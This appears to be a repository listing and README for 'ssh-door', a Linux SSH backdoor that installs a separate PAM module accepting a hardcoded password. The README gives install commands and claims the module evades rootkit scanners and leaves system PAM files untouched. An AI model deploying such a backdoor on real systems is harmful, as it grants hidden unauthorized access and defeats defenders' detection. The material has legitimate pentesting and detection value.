https://github.com/flashnuke/ssh-door

A stealth SSH backdoor leveraging PAM shared object (.so) injection to bypass authentication and gain SSH access.
https://github.com/flashnuke/ssh-door

authentication-bypass backdoor cybersecurity ethical-hacking linux linux-security offensive-security openssh pam pam-authentication pam-module pentesting security ssh ssh-backdoor

Last synced: 19 days ago
JSON representation

A stealth SSH backdoor leveraging PAM shared object (.so) injection to bypass authentication and gain SSH access.

• Host: GitHub
• URL: https://github.com/flashnuke/ssh-door
• Owner: flashnuke
• License: gpl-3.0
• Created: 2025-03-06T14:23:05.000Z (about 1 year ago)
• Default Branch: main
• Last Pushed: 2025-03-07T12:19:38.000Z (about 1 year ago)
• Last Synced: 2025-03-25T21:21:24.625Z (about 1 year ago)
• Topics: authentication-bypass, backdoor, cybersecurity, ethical-hacking, linux, linux-security, offensive-security, openssh, pam, pam-authentication, pam-module, pentesting, security, ssh, ssh-backdoor
• Language: Shell
• Homepage:
• Size: 42 KB
• Stars: 2
• Watchers: 1
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          
```

                █████          █████

                ░░███          ░░███

  █████   █████  ░███████    ███████   ██████   ██████  ████████

 ███░░   ███░░   ░███░░███  ███░░███  ███░░███ ███░░███░░███░░███

░░█████ ░░█████  ░███ ░███ ░███ ░███ ░███ ░███░███ ░███ ░███ ░░░

 ░░░░███ ░░░░███ ░███ ░███ ░███ ░███ ░███ ░███░███ ░███ ░███

 ██████  ██████  ████ █████░░████████░░██████ ░░██████  █████

░░░░░░  ░░░░░░  ░░░░ ░░░░░  ░░░░░░░░  ░░░░░░   ░░░░░░  ░░░░░

```

A simple stealth SSH backdoor leveraging PAM shared object (.so) injection to bypass authentication and gain SSH access.

# How it works

This script creates a PAM backdoor by injecting a custom `.so` module that intercepts SSH login attempts. Unlike traditional PAM backdoors that modify existing system files (e.g., `pam_unix.so`), this method creates a separate PAM module, making it less detectable.

When a user attempts to SSH into the system, the injected module captures the password. If the entered password matches the predefined secret password (hardcoded at compile time), authentication is granted regardless of system credentials.

# Usage

```bash

git clone https://github.com/flashnuke/ssh-door.git && cd ssh-door

sudo bash ./install.sh 

sudo systemctl restart sshd # or 'sudo service sshd restart' for non-systemd

```

Once the script finishes and sshd service is restarted, simply log into the target machine using `ssh @` and enter the predefined password.

### Usage Example



### Notes

* Avoids direct modification of system PAM files (`/lib/security/pam_unix.so` remains untouched)

* Passes security checks (`lynis`, `chkrootkit`, `rkhunter`), avoiding common backdoor detection methods

* Does not alter SSH configuration files (i.e `~/.ssh/authorized_keys`...), making it harder to spot

* In rare cases PAM is enabled in `/etc/ssh/sshd_config`

  

### Requirements

* Linux system with PAM-based authentication

* Root access

* SSH service (sshd) running on the target machine

# Disclaimer

This tool is only for testing and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and am not responsible for any misuse or damage caused by this tool and software.

Distributed under the GNU License.